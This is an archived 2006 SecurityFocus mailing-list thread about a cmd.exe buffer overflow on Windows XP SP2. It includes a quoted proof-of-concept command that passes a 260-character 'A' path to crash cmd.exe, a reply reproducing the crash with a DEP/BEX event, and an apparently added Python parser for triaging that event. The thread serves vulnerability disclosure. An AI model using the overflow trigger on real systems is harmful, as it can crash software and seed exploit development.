Vuln Dev
Re: Windows Command Processor CMD.EXE Buffer Overflow Oct 23 2006 04:35PM
Bernardo Wernesback (bernardosw gmail com)
Reproduced the problem on Windows XP SP2 + All Patches English Version.

EventType : BEX P1 : cmd.exe P2 : 5.1.2600.2180 P3 : 41107ebe
P4 : unknown P5 : 0.0.0.0 P6 : 00000000 P7 : 00410041
P8 : c0000005 P9 : 00000008

DEP went into action and generated a dump to be sent to Microsoft for cmd.exe.

On 10/19/06, gregory_panakkal <gregory_panakkal (at) fastmail (dot) fm [email concealed]> wrote:
>
> Windows Command Processor CMD.EXE Buffer Overflow
> Tested on WinXP SP2
> Impact - Very Low
>
>
> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability's sake).
>
> %COMSPEC% /K "dir
> \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
>
> DEP Comes into the picture.
>
> URL :
> http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html
>
> regards,
> Gregory Panakkal
> www.infogreg.com
> --
> gregory_panakkal
> gregory_panakkal (at) fastmail (dot) fm [email concealed]
>
> --
> http://www.fastmail.fm - I mean, what is it about a decent email service?
>
>
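
As an added example (not part of either post), a small triage parser for the BEX event quoted in the reply. The P1 to P9 field names and the reading of P9 = 8 as a DEP execute fault are assumptions based on the usual Windows Error Reporting BEX layout, and the function names are hypothetical.

```python
import re

# Constructed sample: the BEX event lines quoted in the reply above.
SAMPLE = """EventType : BEX P1 : cmd.exe P2 : 5.1.2600.2180 P3 : 41107ebe
P4 : unknown P5 : 0.0.0.0 P6 : 00000000 P7 : 00410041
P8 : c0000005 P9 : 00000008"""

# Assumed meaning of the BEX bucket parameters (not stated on the page).
FIELDS = {"P1": "app", "P2": "app_version", "P3": "app_timestamp",
          "P4": "module", "P5": "module_version", "P6": "module_timestamp",
          "P7": "offset", "P8": "exception_code", "P9": "exception_data"}

def parse_bex(text):
    """Return the event as a dict keyed by the field names above."""
    pairs = re.findall(r"\b(EventType|P\d)\s*:\s*(\S+)", text)
    return {FIELDS.get(key, key): value for key, value in pairs}

def utf16_text(offset_hex):
    """Read a 32-bit address as two UTF-16LE code units.

    Returns the two characters if both are printable ASCII, else None.
    """
    raw = int(offset_hex, 16).to_bytes(4, "little")
    chars = raw.decode("utf-16-le", errors="replace")
    return chars if all(" " <= c <= "~" for c in chars) else None

def triage(event):
    """List the observations a responder would note for this crash."""
    findings = []
    if event.get("exception_code", "").lower() == "c0000005":
        findings.append("access violation")
    if int(event.get("exception_data", "0"), 16) == 8:
        findings.append("execute fault (DEP)")
    if event.get("module") == "unknown":
        findings.append("fault outside any loaded module")
    text = utf16_text(event.get("offset", "0"))
    if text:
        findings.append(f"fault address decodes to UTF-16 text {text!r}")
    return findings

if __name__ == "__main__":
    for line in triage(parse_bex(SAMPLE)):
        print(line)
```
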

Copyright 2010, SecurityFocus